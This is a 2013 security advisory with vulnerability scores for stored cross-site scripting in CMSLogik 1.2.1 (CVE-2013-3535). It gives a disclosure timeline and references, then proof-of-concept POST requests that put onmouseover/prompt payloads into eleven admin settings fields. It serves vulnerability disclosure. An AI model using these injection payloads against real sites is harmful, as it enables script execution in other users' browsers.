4.3 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
6.1 Medium
AI Score
Confidence
High
0.01 Low
EPSS
Percentile
83.8%
Title: CMSLogik 1.2.1 Multiple Persistent XSS Vulnerabilities
Advisory ID: ZSL-2013-5136
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 14.04.2013
CMSLogik is built on a solid & lightweight framework called CodeIgniter, and design powered by Bootstrap. This combination allows for greater security, extensive flexibility, and ease of use. You can use CMSLogik for almost any niche that your project might fall into.
CMSLogik suffers from multiple stored XSS vulnerabilities when parsing user input to several parameters via POST method. Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user’s browser session.
ThemeLogik - <http://www.themelogik.com/cmslogik>
1.2.1 and 1.2.0
Router Webserver
[05.04.2013] Vulnerability discovered.
[05.04.2013] Contact with the vendor.
[05.04.2013] Vendor replies asking more details.
[05.04.2013] Sent detailed information to the vendor.
[08.04.2013] Vendor confirms the issues promising patch.
[14.04.2013] Public security advisory released.
Vulnerability discovered by Gjoko Krstic - <[email protected]>
[1] <http://cxsecurity.com/issue/WLB-2013040105>
[2] <http://www.exploit-db.com/exploits/24959/>
[3] <http://packetstormsecurity.com/files/121303>
[4] <http://osvdb.org/show/osvdb/92322>
[5] <http://osvdb.org/show/osvdb/92323>
[6] <http://osvdb.org/show/osvdb/92324>
[7] <http://osvdb.org/show/osvdb/92325>
[8] <http://osvdb.org/show/osvdb/92326>
[9] <http://xforce.iss.net/xforce/xfdb/83429>
[10] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-3535>
[11] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3535>
[14.04.2013] - Initial release
[15.04.2013] - Added reference [1] and [2]
[16.04.2013] - Added reference [3], [4], [5], [6], [7] and [8]
[19.04.2013] - Added reference [9]
[14.05.2013] - Added reference [10] and [11]
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>CMSLogik 1.2.1 Multiple Persistent XSS Vulnerabilities
Vendor: ThemeLogik
Product web page: http://www.themelogik.com/cmslogik
Affected version: 1.2.1 and 1.2.0
Summary: CMSLogik is built on a solid & lightweight framework
called CodeIgniter, and design powered by Bootstrap. This
combination allows for greater security, extensive flexibility,
and ease of use. You can use CMSLogik for almost any niche that
your project might fall into.
Desc: CMSLogik suffers from multiple stored XSS vulnerabilities
when parsing user input to several parameters via POST method.
Attackers can exploit these weaknesses to execute arbitrary HTML
and script code in a user's browser session.
Tested on: Apache/2.2.22
PHP/5.3.15
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2013-5136
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5136.php
05.04.2013
--
==============================================================================
POST http://localhost/cmslogik/admin/settings HTTP/1.1
admin_email "onmouseover=prompt("XSS1")>
default_level 2
default_page 1
default_url http://themelogik.com/cmslogik/
email_activate 0
header_title "onmouseover=prompt("XSS2")>
login 1
registration 1
site_title "onmouseover=prompt("XSS3")>
update_settings Update Settings
welcome_email 0
==============================================================================
POST http://localhost/cmslogik/admin/captcha_settings HTTP/1.1
captcha_settings Update
recaptcha_private "onmouseover=prompt("XSS4")>
recaptcha_public "onmouseover=prompt("XSS5")>
==============================================================================
POST http://localhost/cmslogik/admin/social_settings HTTP/1.1
fb_appid "onmouseover=prompt("XSS6")>
fb_secret "onmouseover=prompt("XSS7")>
social_settings Update
tw_consumer_key "onmouseover=prompt("XSS8")>
tw_consumer_secret "onmouseover=prompt("XSS9")>
==============================================================================
POST http://localhost/cmslogik/admin/gallery/save_item_settings HTTP/1.1
imgid 76
long test
short test
slug "onmouseover=prompt("XSS10")>
status live
title test
==============================================================================
POST http://localhost/cmslogik/admin/edit_menu_item_ajax HTTP/1.1
item_link "onmouseover=prompt("XSS11")>
item_name test
item_order 0
mid 9
==============================================================================
</p></body></html>